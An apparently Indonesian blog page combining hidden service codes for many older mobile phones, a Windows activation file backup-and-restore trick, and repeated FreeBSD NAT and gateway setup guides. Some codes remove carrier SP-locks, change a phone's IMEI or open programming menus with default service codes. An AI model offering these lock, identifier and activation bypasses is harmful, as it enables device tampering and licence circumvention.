Judul Buku : Mendeteksi dan Memperbaiki Pesawat Telepon Selular Sendiri
Penerbit : Datakom Lintas Buana
SAMSUNG SGH-600 SECRET CODES
============================
*#06# -> Show IMEI
*#9999# -> Show Software Version
*#0001# -> Show Serial Parameters
*2767*3855# -> Full EEPROM Reset ( THIS CODE REMOVES SP-LOCK!!!! but also
change IMEI to 447967-89-400044-0, you must use CHGIMEI to
restore it)
*2767*2878# -> Custom EEEPROM Reset
*#9998*228# -> Battery status (capacity, voltage, temperature)
*#9998*246# -> Program status
*#9998*289# -> Change Alarm Buzzer Frequency
*#9998*324# -> Debug screens
*#9998*364# -> Watchdog
*#9998*377# -> EEPROM Error Stack
*#9998*427# -> Trace Watchdog
*#9998*523# -> Change LCD contrast
*#9998*544# -> Jig detect
*#9998*636# -> Memory status
*#9998*746# -> SIM File Size
*#9998*778# -> SIM Service Table
*#9998*785# -> RTK (Run Time Kernel) errors
*#9998*786# -> Run, Last UP, Last DOWN
*#9998*837# -> Software Version
*#9998*842# -> Test Vibrator
*#9998*862# -> Vocoder Reg
*#9998*872# -> Diag
*#9998*947# -> Reset On Fatal Error
*#9998*999# -> Last/Chk
*#9998*9266# -> Yann debug screen (=Debug Screens?)
*#9998*9999# -> Software version
*0001*s*f*t# -> Changes serial parameters (s=?, f=0,1, t=0,1) (incomplete)
*0002*?# -> unknown
*0003*?# -> unknown
All CDMA codes...................
Here i post many codes for cdma phones ..............................
Samsung sph-n240, n400, a460, a500, etc Nam Programming:
Nam Set: ##Spc
Test Mode: 47*869#1235
Debug Menu: ##33284,ok
Service Menu: Menu+8+0 (#889)
Reset (Life time, Clear Memory, etc): ##786,ok
A-key: ##2539,ok
Label Selection: ##3882,ok
Label(Home, Work, etc) : **523,ok
NGG Setting (Gateway, etc.): ##2769737,ok
Vocoder: ##8626337,ok
CAI Change: ##7738,ok
Enable TTY: ##889,ok
Samsung sch-411, 611, n105, a100, a300, a2000, etc Nam Programming:
Nam Set: 47*869#08#9
Nam Set: Menu+60
Test Mode: *759#813580
Test Mode: 5809540*45680
A-key: Menu+0, 25##
External Audio: Menu+0, ####
Debug Menu: Menu+8, 0415 or Spc
Debug Menu: Menu+9, 0415 or Spc
Brief NAM Programing: Menu+40,626 (not all version)
LCD Contrast: Menu+45 (not all version)
SIO Mode: Menu+49
SIO Mode: Menu+69
Samsung a300, a530, a610, a620, a660, a670, etc Nam Programming:
Nam Set: Menu, 6, *
Service Menu: Menu, 9, *
Test Mode: 47*68#13580
Samsung X, E, V, S-series (korean), e250, v420, s250, etc Nam Programming:
Nam Set: 6548#0**4#6
Nam Set: 47*869#08#9
Nam Set: 74153697193
Test Mode: 5809540*45680 (88 - efs clear)
Debug Menu: Menu(hold 2sec)+0, 6725 or 9720 or 1973 or 0415
Debug Menu: Menu+0(hold 2sec), 6725 or 9720 or 1973 or 0415
Raja ponsel Training Center
Pusat Service & Pelatihan Teknisi Handphone
HARDWARE DAN SOFTWARE
www.rajaponsel.com
www.wahanaponsel.com
www.majelisrasulullah.org
Jl. Bangka 2 Rt.06 Rw.02 No.18
Jakarta Selatan 12720
Kel. Pela Mampang
Telp. 021 700 36 800 / 0817 839 837
Pelatihan dibimbing oleh Penulis Buku Handphone
Judul Buku : Mendeteksi dan Memperbaiki Pesawat Telepon Selular Sendiri
Penerbit : Datakom Lintas Buana
Samsung N356 (India version) Nam Programming:
Test Mode: Menu, 5, down arrow, *
Test Mode: **00## (in some flashes)
Samsung i700, etc Nam Programming:
Nam Set: Go to start and select "PHONE" from the drop down menu, dial #83587
Samsung i300, etc Nam Programming:
1. Tap on the Phone Icon with stylus
2. Press #907*9#0 ENTER LOCK should appear on screen
3. Enter OTKSL
4. SVC MENU will appear press 1
5. Enter 10 digit MIN and then press SAVE
6. Press SAVE again
7. Press 3 and then press SAVE 6 times
8. Enter the HOME SID and press SAVE once
9. Press END key twice
TEST MODE COMMANDS:
n105_test_mode.txt
a500_test_mode.txt
a530_test_mode.txt
<
Qualcomm qcp-800 Nam Pogramming:
Nam Set: Menu+3+0+Spc
Field Test: Menu+7+0+Fsc
Kyocera 1135, 2255, 3035, 5135, 6035, Se47, etc Nam Programming:
Nam Set: 111111+Jog Dial(Ok), Select "Programming"+Spc
CAI Change: ##7738,ok
Enable TTY: ##889,ok
Life Timer, PRL, etc: ##786,ok
A-key: ##2539,ok
A-key: 2539,ok
Tips:
On some kyocera handsets the factory service module has not been disabled
and the phone can be programmed without the spc by inputting.
Nam Set: ##333333 menu (service)
SANYO>>
Sanyo 4900, 5150, 5300, 8100, etc Nam Programming:
Nam Set: ##Spc+Ok+Key Down+Ok
Advanced Setup: ##3282+Ok+Key Down+Ok+Msl
A-key: ##2539+Ok+Key Down+Ok
Version: ##**837+Ok+Key Down+Ok
Debug Menu: ##FSC+Ok+Key Down+Ok
Airtime menu: ##8463+Ok+Key Down+Ok
Change CAI: ##7738+Ok+Key Down+Ok
Vocoder: ##8626337+Ok+Key Down+Ok
Reverse Logistic: ##786+Ok+Key Down+Ok
Set IP Address: ##2769737+Ok+Key Down+Ok
TTY On/Off: ##889+Ok+Key Down+Ok
Ready Link: ##4636+Ok+Key Down+Ok
Browser Init On/Off: ##4682+Ok+Key Down+Ok
Picture Token: ##25327+Ok+Key Down+Ok
Unknown Code: ##5282277+Ok+Key Down+Ok
(SPC=000000, FSC=040793)
Sanyo scp-A011, smp-A017, etc Nam Programming:
Nam Set: F9(3 beep) + 0*72696#767
<
Nokia 3280, 3285, 3580, 3585, 5185, 6185, 8280, etc Nam Programming:
Nam Set: *3001#12345#
Software Version: *#837#
Software Version: *#9999#
Esn Number: *#92772689#
Restart Phone: *#75681#
Restart Phone: *#75682#
Nokia 8887 Nam Programming:
Nam Set: *3001#12345#
Version: *#0000#
Evrc: *#8378#
Esn/Data/Timer: *#92772689#
SID: *#743#
Nokia 8587 Nam Programming:
Nam Set: *#626#7764726#
A-Key: #8159357022#4579# (26 digits)
A-Key: #8159357022#4547# (20 digits)
Version: *#0000#
Version: *#837#
Vocoder: *#3872#
Change language: Menu 5, 3, 1
Change DM mode: *#7678#
Debug Screen: *#8378#
Debug: *#8380#
Field Test Menu: *#83788#
SPC Unlock, Factory Reset:
Full Factory Reset: *#7370#
Resets all settings including non-user changeable items (like SPC)
NOKIA TEST MODE:
51xx, 61xx, 71xx, 3285, 63xx, etc:
1) Turn on the phone. Press *3001#12345#
2) Scroll up to where it says "Field Test" and choose SELECT
3) Highlight "Enable" and choose OK. Turn the phone off then back on.
4) If the test mode screen does not show up press MENU and scroll
down to "Field Test" choose SELECT. Press 0 1 then choose OK.
5) Lower left or upper left number is the signal strength.
6) To turn off the test mode press MENU and scroll down to where it says
"Field Test" choose SELECT. Press 0 0 and then choose OK.
3360, 6360:
1) Turn on the phone. Press *3001#12345#
2) Scroll up to where it says "Field Test" and choose SELECT
3) Highlight "Enable" and choose OK. Turn the phone off then back on.
4) If the test mode screen does not show up press MENU and scroll
down to "Field Test" choose SELECT. Press 2 1 0 1 then choose OK.
5) Lower left or upper left number is the signal strength.
6) To turn off the test mode press MENU and scroll down to where it says
Raja ponsel Training Center
Pusat Service & Pelatihan Teknisi Handphone
HARDWARE DAN SOFTWARE
www.rajaponsel.com
www.wahanaponsel.com
www.majelisrasulullah.org
Jl. Bangka 2 Rt.06 Rw.02 No.18
Jakarta Selatan 12720
Kel. Pela Mampang
Telp. 021 700 36 800 / 0817 839 837
Pelatihan dibimbing oleh Penulis Buku Handphone
Judul Buku : Mendeteksi dan Memperbaiki Pesawat Telepon Selular Sendiri
Penerbit : Datakom Lintas Buana
"Field Test" choose SELECT. Press 2 1 0 0 and then choose OK.
<
Audiovox 4000, 9000, 9100, 9155, 9500, etc Nam Programming:
(Power the phone on and wait until the little light on top goes out)
Nam Set: 289+fcn+#+1
Service menu: fcn+00+fsc(000000)
Test Mode: Hold (2,*,Rcl)+Power
Test Mode Commands:
99 - download - flash phone
124 - inam data write
125 - version
126 - esn read
127 - sec_code
128 - lock_code
129 - is WFTV data write
137 - FSC code
138 - NPcode (nam program code)
139 - dscode
141 - restart
218 - Read_Addr
000 - is cdma mode
001 - is fm mode
002 - is pcs mode
008 - is reg read addr
020 - is lna_range
Audiovox pcx-3500xl Nam Programming:
Nam Set: ##2726+Send+1998+1+Spc+1
Audiovox cdm-100, 130, 135, 8300, 8500, 8600, etc Nam Programming:
Nam Set: ##20022002+Pwr+1+Spc
Audiovox 8610, 8910, etc Nam programming:
Name Set: ##847446, end, 111111
Audiovox-107 Nam Programming:
Nam Set: 45680*47*869#1
Audiovox CMP-3 Nam Programming:
Nam Set: 45680*47*869#1
Dm Mode: Menu, 6, 6
Audiovox 9950 Nam Programming:
Nam Set: ##3282
Audiovox Z800 (Audiovox 7900, Sharp) Nam Programming:
Nam Set: m + # + envelope key + * + 1
Audiovox Thera (Toshiba 2032) Nam Programming:
Thera Nam Programming User Manual - nam_thera.pdf
AUDIOVOX TEST MODE:
9100, 9155:
1) Turn on the phone. As soon the phone comes on and the green light
turns off press RIGHTARROW, 0, 0. The phone will ask for the
"FSC Code", press 000000 then choose OK and press RIGHTARROW,
RIGHTARROW. Your phone is now in test mode.
2) The signal strength is the number on the top right hand side of the screen.
3) To turn off test mode shut of the phone and then turn it back on.
<
Motorola 7760, 7860, 2260, 8160, etc Nam Programming:
Nam Set: Fcn,0000000000000, Rcl
Nam Set: 74663#, Fcn, Fcn
Test Mode: Fcn, 00**83786633, Sto
Motorola v60c, v120c etc Nam Programming:
Nam Set: 74663#, Menu, Menu, Spc
Nam Set: Menu, 073887, * (type quickly)
Test Mode: Menu, 073887*, Spc
Debug Mode: ##33284
Force the phone into DIGITAL ONLY mode:
1) ##33284 (Debug)
2) RIGHT Softkey (Next) Twice
3) Down arrow 10 times to "PrefMod"
4) RIGHT Softkey (Change) until you see "DigOnly"
5) LEFT softkey (Exit)
6) MENU then LEFT Softkey return to idle screen
7) ##33284 (The last 4 will not display if you have done it correctly)
Motorola t182, c210, etc Nam Programming:
Nam Set: ##1111 end
Nam Set: ##298645665 end
Short Nam: ##073887 sto
Motorola v710, v730, v740, ms150, etc Nam Programming:
Nam Set: 8378*# + press 3 times NATE (spc - 071082)
Test Mode: Menu, 073887*, Spc
Service Menu: #758353266#646#
Raja ponsel Training Center
Pusat Service & Pelatihan Teknisi Handphone
HARDWARE DAN SOFTWARE
www.rajaponsel.com
www.wahanaponsel.com
www.majelisrasulullah.org
Jl. Bangka 2 Rt.06 Rw.02 No.18
Jakarta Selatan 12720
Kel. Pela Mampang
Telp. 021 700 36 800 / 0817 839 837
Pelatihan dibimbing oleh Penulis Buku Handphone
Judul Buku : Mendeteksi dan Memperbaiki Pesawat Telepon Selular Sendiri
Penerbit : Datakom Lintas Buana
Motorola StarTac 2004 Nam Programming:
Nam Set: 5759789*#, rec key (3)times (spc - 915037)
Motorola ms200, ms230, etc Nam Programming:
Nam Set: 5759789*# (spc - 915037)
Motorola v6060 Nam Programming:
Nam Set:147*369#456*0#
MOTOROLA TEST MODE:
v60, c120, c331, etc:
1) Turn on the phone. Press MENU 0 7 3 8 8 7 *
2) The phone will require you to "Enter a Security Code", press 000000, OK
3) Scroll down to "Test mode" choose SELECT. Scroll down to "Enable"
choose SELECT. Your phone is now in test mode.
4) Signal strength is the 3_rd number down on the left hand side of the screen.
5) To toggle between regular mode and test mode: Press MODE then
quickly press the BUTTON DIRECTLY TO THE LEFT OF MENU.
6) To turn off the test mode the phone must be in regular mode, then follow
the above sequence and scroll down to where it says "DISABLE" instead of
"ENABLE" and choose select.
Motorola Bible - bible.txt
<
lgc-300, etc Nam Programming:
Nam Set: Menu, 9, Spc
A-key: Press "Sto" 3sec, 2539**
lgc-330w, etc Nam Programming:
Nam Set: Menu, 4, 0, Spc
A-key: 2539**
sumber
Selasa, 27 Januari 2009
Simpan Aktivasi Windows Anda

Sejak Windows XP, Windows harus diaktivasi supaya bisa dipakai. Kalau tidak diaktivasi, Windows cuma bisa dipakai selama 30 hari. Setelah itu, Windows dikunci dan hanya dapat digunakan kembali setelah diaktivasi.
Vendor peranti lunak lain mulai juga menerapkan teknik yang sama. Lihatlah antivirus dari Symantec atau aplikasi grafis dari Adobe. Sebelum bisa dipakai, peranti lunak harus diaktivasi dulu. Pilihan aktivasi yang umum diberikan adalah melalui Internet atau telepon.
Kenapa sih mau pakai peranti lunak harus melewati proses aktivasi? Tujuannya adalah menekan jumlah penyalahgunaan lisensi serta pembajakan. Dengan aktivasi, vendor peranti lunak dapat memastikan bahwa produk yang di-install pengguna bukan produk bajakan, tapi betul-betul pengguna yang sudah membeli lisensi dan lisensi itu digunakan dengan benar.
Anggaplah ada seorang pengguna komputer yang punya lisensi Windows untuk satu komputer. Pengguna tersebut menginstal di komputernya dan melakukan aktivasi. Ia punya komputer lain yang ia instali Windows yang sama. Windows di komputer kedua itu tidak bisa diaktivasi.
Aktivasi bisa dijadikan solusi menekan jumlah pembajakan produk bagi para pembuat peranti lunak. Tapi, cara ini bisa jadi sedikit masalah bagi pemilik lisensi resmi. Mengapa? Karena, jika pemilik komputer tidak memiliki koneksi internet, ia harus lebih repot melakukan aktivasi via telepon. Bayangkan, proses itu harus ia ulang ketika ia meng-install ulang Windows di komputernya.
Untuk masalah itu PCplus punya solusinya! Sebelum Anda melakukan install ulang Windows, ikuti dulu langkah-langkah ini.
1. Jalankan Windows Explorer.
2. Buatlah sebuah folder baru. Misalnya, folder bernama “backup” yang lokasinya ada di drive D.
3. Masuklah ke folder C:-WINDOWS-system32-. Jika Anda meng-install Windows di drive lain, Anda dapat menyesuaikan folder itu dengan drive yang Anda gunakan.
4. Pada bagian kanan jendela akan muncul sebuah informasi yang menyatakan bahwa file yang ada pada folder tersebut pada kondisi tersembunyi. Klik [Show the contents of this folder] untuk menampilkan isi dari folder system32.
5. Setelah folder system32 terbuka, carilah file bernama wpa.dbl.
6. Salin file wpa.dbl tersebut ke folder yang sebelumnya telah Anda buat (D:-backup).
Anda sudah boleh meng-install ulang Windows Anda. Setelah Windows sudah ter-install, lanjutkan pekerjaan dengan langkah-langkah ini.
1. Restart komputer dan tekan tombol [F8] pada keyboard sesaat sebelum komputer masuk ke sistem operasi Windows.
2. Pilih [Safe Mode].
3. Setelah masuk ke Windows, jalankan kembali Windows Explorer.
4. Masuklah ke folder D:-backup, tempat file backup wpa.dbl disimpan. Salin kembali file tersebut ke folder C:-WINDOWS-system32-.
5. Ketika file wpa.dbl Anda paste, akan muncul informasi bahwa file tersebut telah tersedia pada folder system32. Klik [Yes] saja.
6. Langkah terakhir, restart Windows. Windows tidak lagi meminta diaktivasi.
Ah, ada yang harus diperhatikan. Pastikan perangkat keras yang Anda gunakan tidak ada yang berubah sebelum dan sesudah Anda meng-install ulang Windows. Jika Anda menambah atau mengurangi perangkat keras komputer, trik ini tidak bisa digunakan.
Sumber: PCplus
Sabtu, 24 Januari 2009
Install Gateway Service FreeBSD
Chek kernel apakah sudah ada options-options berikut:
options IPDIVER # Untuk Gateway
options IPFIREWALL # Untuk Keamanan
options IPFIREWALL_VERBOSE # Untuk melihat proses keamanan
options DUMMYNET # Untuk membatasi bandwidth
#vi /sys/i386/conf/GENERIC
Perintah diatas untuk melihat file konfigurasi kernel (kernel yang digunakan GENERIC)
Jika options² diatas belum ada, maka kernel harus dikompile ulang dengan menambahkan options² tersebut.
Klik disini untuk langkah² kompile kernel.
Edit File rc.conf
#vi /etc/defaults/rc.conf
Ubahlah variable² berikut, dan sesuaikan dengan network card yang terinstall.
hostname=”xxx.xxx.xxx”
natd_interface=”xl0″ [Ethernet card IP Register]
ifconfig_xl1=”inetxxx.xxx.xxx.xxx netmask xxx.xxx.xxx.xxx” [IP Privat--> untuk gateway]
inet_flags=”-wW -l -R 1024″
firewall_enable=”YES”
firewall_type=”OPEN”
natd_enable=”YES”
netd_flags=”-u”
:wq [keluar dan disimpan]
Reboot komputer dengan perintah berikut
# shutdown-r
atau
# reboot
options IPDIVER # Untuk Gateway
options IPFIREWALL # Untuk Keamanan
options IPFIREWALL_VERBOSE # Untuk melihat proses keamanan
options DUMMYNET # Untuk membatasi bandwidth
#vi /sys/i386/conf/GENERIC
Perintah diatas untuk melihat file konfigurasi kernel (kernel yang digunakan GENERIC)
Jika options² diatas belum ada, maka kernel harus dikompile ulang dengan menambahkan options² tersebut.
Klik disini untuk langkah² kompile kernel.
Edit File rc.conf
#vi /etc/defaults/rc.conf
Ubahlah variable² berikut, dan sesuaikan dengan network card yang terinstall.
hostname=”xxx.xxx.xxx”
natd_interface=”xl0″ [Ethernet card IP Register]
ifconfig_xl1=”inetxxx.xxx.xxx.xxx netmask xxx.xxx.xxx.xxx” [IP Privat--> untuk gateway]
inet_flags=”-wW -l -R 1024″
firewall_enable=”YES”
firewall_type=”OPEN”
natd_enable=”YES”
netd_flags=”-u”
:wq [keluar dan disimpan]
Reboot komputer dengan perintah berikut
# shutdown-r
atau
# reboot
Performance natd di freebsd
Sewaktu saya mensetting natd dengan ipfw/divert di FreeBSD, pada saat traffik padat dan jumlah pc LAN semakin besar kerja Processor juga menjadi semakin berat. menhakibatkan performance router jadi turun juga.
solusi yang bisa di pakai adalah dengan menggunakan ipnat. Perbedaan antara natd dengan ipnat adalah :
* Natd adalah userland process, sehingga akan banyak memakai resources system sewaktu harus komunikasi dengan kernel
* sedangkan ipnat di load di kernel, dan berjalan lebih cepat. [man inat]
Konfigurasi IPNAT
Pertama kita perlu setting mesin Freebsd agar menjalankan ipnat dan berfungsi sebagai gateway.
Tambahkan baris berikut di file /etc/rc.conf :
gateway_enable="YES"
ipfilter_enable="YES"
ipnat_enable="YES"
ipnat_rules="/etc/ipnat.rules"
Kemudian kita perlu membuat file ipnat.rules . di bawah saya sertakan contohnya:
### ---------------------------------------------------------------------
# Sample /etc/ipnat.rules by tunggul
# Jul 24 19:10:12 PST 2008
#
# Load this like:
# ipnat -C -f /etc/ipnat.conf
# /etc/rc.d/ipnat start (will delete active sessions...)
#
### ---------------------------------------------------------------------
### ---------------------------------------------------------------------
### Contoh untuk meredirect port webserver
### Ubah 'fxp0' sesuai dengan ethernet anda.
### ---------------------------------------------------------------------
rdr fxp0 69.22.154.11/32 port 80 -> 10.1.1.2 port 80 tcp
rdr fxp0 69.22.154.12/32 port 80 -> 10.1.1.3 port 80 tcp
rdr fxp0 69.22.154.13/32 port 80 -> 10.1.1.5 port 80 tcp
rdr fxp0 69.22.154.11/32 port 443 -> 10.1.1.2 port 443 tcp
rdr fxp0 69.22.154.12/32 port 443 -> 10.1.1.3 port 443 tcp
rdr fxp0 69.22.154.13/32 port 443 -> 10.1.1.5 port 443 tcp
rdr fxp0 69.22.154.11/32 port 22 -> 10.1.1.2 port 22 tcp
### ---------------------------------------------------------------------
### Example Outgoing Mapping
### All out going requests from the internal 10.1.1.0/24 network
### will appear to be coming from 69.22.154.14
### ---------------------------------------------------------------------
map fxp0 10.1.1.0/24 -> 69.22.154.14/32
### ---------------------------------------------------------------------
### Example Round Robin load balancer
### ---------------------------------------------------------------------
# www.monkeybrains.net 69.22.154.65
rdr fxp0 69.22.154.65/32 port 80 -> 10.1.101.65 port 80 tcp round-robin
rdr fxp0 69.22.154.65/32 port 80 -> 10.1.102.65 port 80 tcp round-robin
rdr fxp0 69.22.154.65/32 port 80 -> 10.1.103.65 port 80 tcp round-robin
Konigurasi jumlah Maksimal Active Sessions
Sewaktu pertama kali setting ipnat, router jadi tidak bisa respon karena maksimal koneksi untuk client cuman 30.000 mappings. Untuk melihat jumlah mapping saat ini dengan perintah : ipnat -s .
# ipnat -s
mapped in 105990558 out 100799549
added 13276971 expired 0
no memory 0 bad nat 731
inuse 24837
rules 34
wilds 0
Pertanyaan selanjutnya berapa kita harus setting koneksi untuk ipnat ? untuk mengecek gunakan perintah berikut :
# ipf -T list | grep nattable
ipf_nattable_sz min 0x1 max 0x7fffffff current 2047
ipf_nattable_max min 0x1 max 0x7fffffff current 30000
Untuk mensetting bisa dilakaukan dengan dua cara :
* Cara yang susah dengan recompile ipfilter:
/usr/src/sys/modules/ipfilter && make clean
make -DLARGE_NAT depend && make -DLARGE_NAT && make install
* Cara yang mudah dengan menambah variabel di ipfilter.
Set /etc/rc.conf:
ipfilter_enable="YES"
ipfilter_rules="/etc/ipf.rules"
ipfilter_flags="-D -T ipf_nattable_sz=10009,ipf_nattable_max=300000 -E"
ipnat_enable="YES"
ipnat_rules="/etc/ipnat.rules"
Setelah mengubah file /etc/rc.conf, restart ipfilter
Sekarang anda bisa menghandle sampai 300,000 NAT Mappings. gunakan ipnat -l untuk melihat session yang aktif.
Setting agar waktu Timeouts kecil
Setting ini berfungsi memperkecil TCP session timeout untuk NAT sessions. Sehingga bisa meningkatkan jumlah Maximum Active Sessions yang bisa di handle per time. Ubah setting ipfilter_flags di file /etc/rc.conf:
ipfilter_flags=”-D -T ipf_nattable_sz=10009,ipf_nattable_max=300000,\ fr_tcptimeout=180,fr_tcpclosewait=60,fr_tcphalfclosed=7200,fr_tcpidletimeout=172800 -E”
sumber:http://tunggul.staff.uns.ac.id
solusi yang bisa di pakai adalah dengan menggunakan ipnat. Perbedaan antara natd dengan ipnat adalah :
* Natd adalah userland process, sehingga akan banyak memakai resources system sewaktu harus komunikasi dengan kernel
* sedangkan ipnat di load di kernel, dan berjalan lebih cepat. [man inat]
Konfigurasi IPNAT
Pertama kita perlu setting mesin Freebsd agar menjalankan ipnat dan berfungsi sebagai gateway.
Tambahkan baris berikut di file /etc/rc.conf :
gateway_enable="YES"
ipfilter_enable="YES"
ipnat_enable="YES"
ipnat_rules="/etc/ipnat.rules"
Kemudian kita perlu membuat file ipnat.rules . di bawah saya sertakan contohnya:
### ---------------------------------------------------------------------
# Sample /etc/ipnat.rules by tunggul
# Jul 24 19:10:12 PST 2008
#
# Load this like:
# ipnat -C -f /etc/ipnat.conf
# /etc/rc.d/ipnat start (will delete active sessions...)
#
### ---------------------------------------------------------------------
### ---------------------------------------------------------------------
### Contoh untuk meredirect port webserver
### Ubah 'fxp0' sesuai dengan ethernet anda.
### ---------------------------------------------------------------------
rdr fxp0 69.22.154.11/32 port 80 -> 10.1.1.2 port 80 tcp
rdr fxp0 69.22.154.12/32 port 80 -> 10.1.1.3 port 80 tcp
rdr fxp0 69.22.154.13/32 port 80 -> 10.1.1.5 port 80 tcp
rdr fxp0 69.22.154.11/32 port 443 -> 10.1.1.2 port 443 tcp
rdr fxp0 69.22.154.12/32 port 443 -> 10.1.1.3 port 443 tcp
rdr fxp0 69.22.154.13/32 port 443 -> 10.1.1.5 port 443 tcp
rdr fxp0 69.22.154.11/32 port 22 -> 10.1.1.2 port 22 tcp
### ---------------------------------------------------------------------
### Example Outgoing Mapping
### All out going requests from the internal 10.1.1.0/24 network
### will appear to be coming from 69.22.154.14
### ---------------------------------------------------------------------
map fxp0 10.1.1.0/24 -> 69.22.154.14/32
### ---------------------------------------------------------------------
### Example Round Robin load balancer
### ---------------------------------------------------------------------
# www.monkeybrains.net 69.22.154.65
rdr fxp0 69.22.154.65/32 port 80 -> 10.1.101.65 port 80 tcp round-robin
rdr fxp0 69.22.154.65/32 port 80 -> 10.1.102.65 port 80 tcp round-robin
rdr fxp0 69.22.154.65/32 port 80 -> 10.1.103.65 port 80 tcp round-robin
Konigurasi jumlah Maksimal Active Sessions
Sewaktu pertama kali setting ipnat, router jadi tidak bisa respon karena maksimal koneksi untuk client cuman 30.000 mappings. Untuk melihat jumlah mapping saat ini dengan perintah : ipnat -s .
# ipnat -s
mapped in 105990558 out 100799549
added 13276971 expired 0
no memory 0 bad nat 731
inuse 24837
rules 34
wilds 0
Pertanyaan selanjutnya berapa kita harus setting koneksi untuk ipnat ? untuk mengecek gunakan perintah berikut :
# ipf -T list | grep nattable
ipf_nattable_sz min 0x1 max 0x7fffffff current 2047
ipf_nattable_max min 0x1 max 0x7fffffff current 30000
Untuk mensetting bisa dilakaukan dengan dua cara :
* Cara yang susah dengan recompile ipfilter:
/usr/src/sys/modules/ipfilter && make clean
make -DLARGE_NAT depend && make -DLARGE_NAT && make install
* Cara yang mudah dengan menambah variabel di ipfilter.
Set /etc/rc.conf:
ipfilter_enable="YES"
ipfilter_rules="/etc/ipf.rules"
ipfilter_flags="-D -T ipf_nattable_sz=10009,ipf_nattable_max=300000 -E"
ipnat_enable="YES"
ipnat_rules="/etc/ipnat.rules"
Setelah mengubah file /etc/rc.conf, restart ipfilter
Sekarang anda bisa menghandle sampai 300,000 NAT Mappings. gunakan ipnat -l untuk melihat session yang aktif.
Setting agar waktu Timeouts kecil
Setting ini berfungsi memperkecil TCP session timeout untuk NAT sessions. Sehingga bisa meningkatkan jumlah Maximum Active Sessions yang bisa di handle per time. Ubah setting ipfilter_flags di file /etc/rc.conf:
ipfilter_flags=”-D -T ipf_nattable_sz=10009,ipf_nattable_max=300000,\ fr_tcptimeout=180,fr_tcpclosewait=60,fr_tcphalfclosed=7200,fr_tcpidletimeout=172800 -E”
sumber:http://tunggul.staff.uns.ac.id
ROUTER Freebsd dengan nat
kemarin aku baru cobak distro baru unix freebsd.. kok malah aku kecantol ma freebsd
cinta pada pandangan pertama nih… aku mulai dari download tutorial dari embah google
nyuri sana sini.. akhirnya aku buat dhe coretan ini.. okehh….
sejauh ini udah aku buktikan udah bisa.. alhamdulillah.. langsung aja dhe.. kalo
mau makan, makan aja dulu, mau kebelakang cpt kebelakang……z z z zz
kalo udah siap.. lemas kan jari2 anda.. siapkan segala nya
mulai dari mental n spirit anda …
karena kita udah mulai semangat mengikuti projek ini..
ambil nafas dalam-dalam… keluarkan .. lakukan sesuai selera anda..
are you ready…. 1 …. 2
1. install dulu OS freebsd nya
2. install dengan packet yang minimum aja biar g lama..
3. setelah itu kita mulai compile kernel, tapi sebelunya periksa dulu
/usr/rc/sys/ kalo belum ada berarti belum ada.. perlu di install dulu thu packetnya
4. install kernel yuukk… mounting terlebih dahulu cdrom nya.. mount /cdrom/ kalo udah
ketik aja “sysinstall” pilih paket agar bisa download dari luar kita instal port
nya juga “port” dicentang lagi
5. sesudah itu kita mulai compile kernel pertama kita cp dulu file GENERIC yang ada di
directory /usr/src/sys/i386/conf/ sebagai contoh saya cp dengan nama ROUTER
6. kalo udah kita copy kita edit file ROUTER yang kita copy tadi “ee ROUTER”
7. ganti indent GENERIc dengan indent ROUTER tambah kan opiton berikut:
options IPFIREWALL
options IPFIREWALL_FORWARD
options IPFIREWALL_VERBOSE
options IPFIREWALL_VERBOSE_LIMIT=10
options IPFIREWALL_DEFAULT_TO_ACCEPT
options IPDIVERT
options IPSTEALTH
options DUMMYNET
options HZ=1000
options IPFILTER
options IPFILTER_LOG
#speedy
options NETGRAPH
options NETGRAPH_ETHER
options NETGRAPH_PPPOE
options NETGRAPH_SOCKET
#management bw
options ALTQ # Alternate queueing
options ALTQ_CBQ # Class Based Queueing
options ALTQ_RED # Random Early Detection
options ALTQ_RIO # Triple RED for DiffServ (needs RED)
options ALTQ_HFSC # Hierarchical Fair Service Curve
options ALTQ_CDNR # DiffServ traffic conditioner
options ALTQ_PRIQ # Priority Queue
#packet filter
device pf
device pflog
device pfsync
#squid
options SYSVMSG
options MSGMNB=8192
options MSGMNI=40
options MSGSEG=512
options MSGSSZ=64
options MSGTQL=2048
options SYSVSHM
options SHMSEG=16
options SHMMNI=32
options SHMMAX=2097152
options SHMALL=4096
agar lebih enak kita hilangin aja option yang g berguna seperti SCI,RAID, dll
sesuaikan dengan kompi anda pokok e..
8. kalo udah ketikkan “#configur ROUTER” sesudah itu “#make cleandepend && make depend”
tunggu sambil ngopi g boleh ngerokok he he… kalo udah “#make && make install”
wah nunggu lagi nih kita makan aja dulu.. kan dah laper
bung kalo udah kita ngapain lagi
kita reboot kompi kita.. kalo udah login lalu kita ketik uname -i kalo udah muncul
“ROUTER” berbahagialah hasil compile anda ..::berhasil”…
9. Konfigurasi IP Address:
sebelum anda lakukan setting ini, tanyakan milik anda, mulai dari IP Public, subnet, gateway lengkap
dengan DNS nya kepada ISP anda. kemudian lanjutkan dgn perintah ini:
# ee /etc/rc.conf
hostname=”iwan.com” ==> ada g thu
ifconfig_rl0=”inet 199.199.199.7 netmask 255.255.255.0? ==> ke internet
ifconfig_rl1=”inet 192.168.0.1 netmask 255.255.255.0? ==> ke LAN
defaultrouter=”199.199.199.1?
kemudian simpan, lanjutkan ke setting DNS.
Setting DNS:
10. # ee /etc/resolve.conf
Domain jardiknas.org
nameserver 118.98.224.2 ==> dns1 anda
nameserver 118.98.224.3 ==> dns2 kamu
pastikan router kita bisa akses internet.. ping aja ke google.com “#ping google.com”
kalo dah replay wah lanjut dhe..
11.Setting Firewall, Natd, dan service-service lainnya:
# ee /etc/defaults/rc.conf
selanjutnya akan muncul spt dibawah ini:
defaultrouter =”YES”
gateway_enable = “YES”
sshd_enable =”YES” # agar bisa remote dgn putty
firewall_enable =”YES” # sebagai filter
firewall_type =”OPEN”
natd_enable =”YES”
natd_interface =”rl0? # lan card yg disambung ke IP Public / internet.
sendmail semuanya yang “YES” diganti “NO” untuk men-disable service sendmail.
simpan konfigurasi ini, kemudian reboot komputer:
12.# reboot
sejauh ini fungsi router standart sudah selesai, g percaya?? coba aja di client..
akan tetapi jika anda ingin menambah konfigurasi
lanjutkan saja tahab berikut:
Mengaktifkan ftp, ssh,telnet, dll:
# ee /etc/inetd.conf
ftp tcp nowait # hapus tanda pagar di depan teks ftp
ssh tcp nowait # hapus tanda pagar di depan teks ssh
telnet tcp nowait # hapus tanda pagar di depan teks telnet
Mengganti Port ssh:
# ee /etc/ssh/sshd_config
~
#VersionAddendum FreeBSD-20050903 ~
Port 22 # hilangkan tanda pagar didepan teks port dan angka 22 boleh anda ganti
ke 2222/7575 sesuai dengan selera anda.
